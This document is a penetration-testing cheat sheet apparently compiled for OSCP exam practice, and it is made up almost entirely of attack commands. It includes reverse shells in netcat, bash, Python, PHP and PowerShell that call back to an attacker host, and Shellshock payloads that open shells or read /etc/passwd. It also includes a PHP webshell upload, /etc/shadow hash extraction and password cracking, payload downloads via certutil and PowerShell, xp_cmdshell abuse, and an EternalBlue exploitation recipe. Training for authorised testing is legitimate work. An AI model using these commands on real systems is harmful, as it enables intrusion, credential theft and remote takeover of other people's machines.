Offensive Security Testing Guide
This cheat sheet is the compilation of commands we learnt to exploit the vulnerable machines.
The commands below may not be enough for you to obtain your Offensive Security Certified Professional (OSCP).
So... Try Harder!
Information Gathering
Operating System
Windows
Interesting Path"Documents and Settings"/Administrator/Desktop
file:///C:/xampp/readme_en.txt
file:///C:/xampp/passwords.txt
file:///C:/xampp/webdav/webdav.txt
file:///C:/xampp/apache/conf/extra/httpd-dav.conf
file:///C:/xampp/apache/conf/extra/httpd-xampp.conf
file:///C:/xampp/apache/logs/access.log
file:///C:/xampp/apache/logs/error.log
file:///C:/xampp/security/webdav.htpasswd
file:///C:/xampp/htdocs/dashboard/phpinfo.php
file:///C:/xampp/phpmyadmin/config.inc.php
file:///C:/xampp/php/logs/php_error_log
file:///C:/xampp/mysql/bin/my.ini
C:\Users\<User>\AppData\Local\Temp
#Email Address
C:\Users\<User>\AppData\Local\Microsoft\Outlook
Active Connection
netstat -anob #Require elevation
netstat -ano #Without Elevation
tasklist
User or System Enumeration
echo %username%
Shell to Meterpreter Upgrade
use post/multi/manage/shell_to_meterpreter
Linux
Identify OSuname -a
cat /etc/lsb-release
Exploring Directories
ls *
ls -R <path> #lists directory tree recursively
ls -la * #list long format including hidden files
Identify Filetype
file <filename>
File Compression/Decompression
tar xvf <filename>
Retrieve Password Hashes
cat /etc/shadow | grep '\$' | cut -d ':' -f -2
Execute Commands for 10 times
for i in {1..10}; do whoami; done
Steganography
binwalk -e <picture_file>
exiftool <picture_file>
steghide extract -sf <picture_file>
Web Application Request Parameter
wfuzz -c -z file,burp-parameter-names.txt --hh=19 http://<target_URL>/<page>?FUZZ=test
http://wfuzz.readthedocs.io/en/latest/user/basicusage.html#fuzzing-parameters-in-urls
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/burp-parameter-names.txt
Web Application Directories
cewl <target URL> > wordlist.txt
Web Application Sensitive Page
Apache
/etc/apache2/sites-enabled/000-default.conf
WordPress
/wp-config.php
Mail Server
POP3
USER <username>
PASS <password>
LIST #displays a summary of message
RETR <message_number> #retrieve a particular message
Hash & Encryption
Identify Hash
hash-identifier
Cracking Hash
hashcat64.exe --force -m 1400 -a 0 <hash_file> <dictionary_file>
john <hash_file> --format=mysql-sha1 --wordlist=<dictionary_file>
john <hash_file> --format=raw-sha1 --wordlist=<dictionary_file>
Toolshttps://github.com/UltimateHackers/Hash-Buster
Dictionary Attack
SSHhydra -L <user_dict> -P <pwd_dict> <victim_ip_addr> ssh
Cracking ZIP
fcrackzip -u -D -p <dictionary_file> <zip_file>
RSA Attack
RsaCtfTool.py --publickey <decoder.pub> --uncipher <pass.crypt>
Reference:https://github.com/Ganapati/RsaCtfTool
Decode Base64
base64 -d <<< <based_64_encoded_value>
Convert Hexadecimal to Text
echo <hexadecimal_value> | xxd -r -p
Convert Decimal to Hexadecimal
python -c "print format(<decimal_value>, 'x').decode('hex')"
Thick Client Application
Executable File
strings <executable_file>
Disassemble Java Class File
javap -c <java_class>.class | tee <output_file>.txt
Connection Establish
Listener (Attacker)
nc -nvlp 8099
nc -nvlp 8099 -u #UDP
Request (Victim)
/bin/nc -e /bin/sh <target_ip_addr> 8099
nc -e /bin/bash <target_ip_addr> 8099
bash -i >& /dev/tcp/<target_ip_addr>
/8099 0>&1
Reference:
Exploitation using Shell
SSH
ssh -i <rsa_private_key_file>.key <user>@<target_IP_address>
SSH (IPv6)
ssh -6 -i <rsa_private_key_file>.key <user>@<target_IP_address>
RDP
rdesktop -u <username> -p <password> <target_ip_address>
Python
python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('<listener_ip>',8099));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/sh','-i']);"
Database
MSSQL
sqsh -S <target_IP_address> -U <username>
MySQL
mysql -h <target_IP_address> -u <username> -p
Application
WebDav
cadaver http://<target_ip>/<webdav_path>/
put <webshell>
Shellshock
wget -U "() { test;};echo \"Content-type: text/plain\"; echo; /bin/bash -c 'echo vulnerable'" http://<target_ip_address>/cgi-bin/<vulnerable>.cgi
wget -U "() { test;};echo \"Content-type: text/plain\"; echo; /bin/bash -i >& /dev/tcp/<listener_ip>/8099 0>&1" http://<target_ip_address>/cgi-bin/<vulnerable>.cgi
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" 'http://10.10.10.56/<target_ip_address>/<vulnerable>.sh'
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/<listener_ip>/8099 0>&1'" \http://<target_ip_address>/cgi-bin/<vulnerable>
Proxy
SSH
proxytunnel -p <victim_ip_addr>:<port> -d 127.0.0.1:22 -a 8099
ssh <user>@127.0.0.1 -p 8099 "/bin/sh"
File/Content Transfer
Linux
wget http://<attacker_ip>/<file> -O /<path>/<filename> 2>&1
wget --no-check-certificate https://<attacker_ip>/<file>
curl -O http://<attacker_ip>/<file> 2>&1
fetch -o <filename> http://<attacker_ip>/<file>
FTP
Set file transfer mode to BINARY (Used to transfer non-ASCII files)binary
To browse directories and retrieve file
LIST C:\\<Directory Name>
RETR C:\\<Directory Name>\\<File Name>
Netcat
Victimnc <attacker_ip_address> 8099 < <file>.txt
Attackernc -lnvp 8099 > <file>.txt
HTTP PUT Method
curl -v -X PUT -d '<?php system ($_GET["cmd"]); ?>' http://<target_ip_addr>/<path>/shell.php
NFS
cp /bin/bash /mnt/<share>
chmod 4777 bash
./bash -p
Powershell
C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe wget "http://<attacker_ip>/<file>" -outfile "<output_file_name>"
powershell -command "(New-Object System.Net.WebClient).DownloadFile('http://<attacker_ip>/<file>', '<output_file_name>')"
powershell -command "Invoke-WebRequest 'http://<attacker_ip>/<file>' -OutFile '<output_file_name>'"
Certutil
certutil -urlcache -split -f http://<attacker_ip>/<file> <output_file_name>
Code Execution
Python
import subprocess
subprocess.check_output(['whoami'])
import os
import sys
os.system('nc -e /bin/bash <attacker_ip> 8099')
PHP
<?php passthru("rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc <attacker_ip_address> 8099 > /tmp/f"); ?>
MS SQL
EXEC SP_CONFIGURE N'show advanced options', 1
go
EXEC SP_CONFIGURE N'xp_cmdshell', 1
go
RECONFIGURE
go
xp_cmdshell 'cd C:\<path_to_bind_shell>\ & <bind_shell_name>.exe';
go
Oracle iSQL* Plus
exec dbms_java.grant_permission( 'SYSTEM','SYS:java.io.FilePermission', '<<ALL FILES>>', 'execute');
begin
dbms_java.grant_permission
('SYSTEM',
'java.io.FilePermission',
'<<ALL FILES>>',
'execute');
dbms_java.grant_permission
('SYSTEM',
'java.lang.RuntimePermission',
'*',
'writeFileDescriptor' );
end;
exec javacmd('<command>');
Power Shell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.56.101',8099);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Reference:
Reverse Shell Cheat Sheet | pentestmonkey
TTY Shell
Python
which python
which bash
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
Perl
/usr/bin/perl -e 'exec "/bin/sh"'
VIM
:set shell=/bin/bash
:shell
AWK
awk 'BEGIN {system("/bin/sh")}'
Reference:
NETSEC - Spawning a TTY Shell
SANS Penetration Testing | Escaping Restricted Linux Shells
Buffer Overflow
Reference:http://www.axcelsec.com/2018/05/buffer-overflow.html
Remote Code Execution (Windows)
MS17-010nasm -f bin eternalblue_kshellcode_x86.asm
msfvenom -p windows/meterpreter/reverse_tcp -f raw -o msf.bin EXITFUNC=thread LHOST=<Local IP> LPORT=8099
cat eternalblue_kshellcode_x86 msf.bin > sc_x86.bin
python eternalblue_exploit7.py <Target IP> shellcode/sc_x86.bin
Reference: https://github.com/vivami/MS17-010
Post Exploitation
Reference:https://www.axcelsec.com/2019/05/post-exploitation.html